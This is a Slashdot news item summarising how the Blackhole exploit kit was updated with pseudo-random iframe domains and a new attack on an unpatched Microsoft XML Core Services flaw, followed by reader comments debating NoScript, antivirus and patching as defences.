Blackhole Exploit Kit Gets an Upgrade 43
wiredmikey writes "The popular Blackhole exploit kit, assumed to be created and maintained by an individual going by the online moniker of 'Paunch,' who continuously updates the browser exploit software, looks like it has just received another upgrade. The exploit works by infecting a user when they visit a Blackhole-infected site, and their browser runs the JavaScript code, usually via a hidden iframe. If the location or URL for the malicious iframe changes or is taken down, all of the compromised sites will have to be updated to point to this new location, making it hard for the attackers. To deal with this, the Blackhole JavaScript code on compromised sites now dynamically generates pseudo-random domains, based on the date and other information, and then creates an iframe pointing to the generated domain. Moreover, the kit's recent upgrade also added a new attack. According to Sophos, sometime in early June Blackhole was updated to include an attack that targets a flaw in Microsoft's XML Core Services, which remains unpatched. Unfortunately, the changes prove once again that the criminal economy online is alive and well."
Firefox + NoScript (Score:4, Insightful)
Problem fecking solved. Nobody should be running without a script blocker in this day and age.
Before a knee jerk posts... (Score:5, Insightful)
Before a knee jerk posts "I use NoScript -- I'm safe!"...
This doesn't mean that JavaScript is insecure. It just means there's an exploitable unpatched vulnerability in JS in some browser. The fact that this malware uses JavaScript + iframe doesn't mean JavaScript is inherently insecure or less secure than bare HTML.
And now the worst news of all for you: the HTML engine (or any other portion) of the browser can and often does contain exploitable unpatched vulnerabilities. So even if you disable JavaScript you can get infected.
The bottom, line the best way to protect yourself is honor the following three golder rules:
1. Keep your browser and OS updated with security fixes.
2. Don't visit suspicious websites and don't open suspicious email attachments.
3. Use a good antivirus that monitors your internet traffic.
Profit?
Re:Before a knee jerk posts... (Score:5, Insightful)
You don't know how plugins work with modern browsers. Please stop pretending that you do.
Without the JS redirect, there is no avenue for infection. Period. NoScript will stop this, properly configured. Period. Because of the nature of the kit, most antivirus products WILL NOT protect you from the threat. Period.
Yes this particular exploit (and any other JS based exploits, probably). Guy you are replying to said that while NoScript might protect you from JS based exploits, it does not protect you from exploits that targets elements not affected by NoScript or exploits aimed at NoScript itself.
The internet is a dangerous place, sometimes bad stuff slips through the cracks. There isn't a silver bullet solution that will keep you 100% safe 100% of the time.
Re:Firefox + NoScript (Score:0, Insightful)
The evidence anything executable is unsafe cannot be disputed.
FTFY. That includes JS, NPAPI, ActiveX, NaCl and whatever somebody will think up next.
I've turned JS off in my Opera (can whitelist individual sites through F12 - Site preferences - Scripting), and plugins are configured to run on click.
Re:Before a knee jerk posts... (Score:3, Insightful)
How do you know you have never had an infection if you don't occasionally scan? Exploits for Linux-based systems have been found in the wild before -- Red Hat releases patches on an almost daily basis. You are certainly /more/ secure than a Windows user, but the only truly secure system is the one without both power and network connectivity. You are advocating a poor security posture by suggesting that Linux users need not worry about infection.
Re:Before a knee jerk posts... (Score:4, Insightful)
Funny, I often wonder how so many people can view with the WWW without NoScript installed! Zooming up fake windows, continually scrolling sidebars, attack ads, "do you want to chat with a representative online" boxes, it seems like there are usually about three things to dismiss before even uncovering most content.
However, I'd certainly agree that NoScript is not for the uninitiated. It doesn't pass the mom test, or even the wife test. Most people just want things to work, and are willing to put up with whatever crap they're served in order to get it. I'm willing to view the static content, and if there's something deeper to explore, I understand up front that I might have to whitelist a few things to get it to work. Note that you can configure NoScript to automatically permit scripts originating from "base 2nd level domains" (i.e. allow everything from *.foobar.com when you're on www.foobar.com), which generally enables local content to work just fine, while still preventing XSS nonsense. The only place where I commonly run into trouble is with video content, as it's generally hosted somewhere else like Vimeo or YouTube, and with third party SSO providers like Yahoo. In all, over many years of browsing I've added some margin of trust for about a hundred sites which seem to have taken care of most of those issues.
Re:Firefox + NoScript (Score:5, Insightful)
If you run NoScript, essentially every web site in existence is broken by default and has to be whitelisted. If you get into the habit of auto-allowing everything, you're no safer than you would be without it installed, and if you don't, then you have to manually spend 5 minutes picking and choosing which scripts you have to enable for the page to work.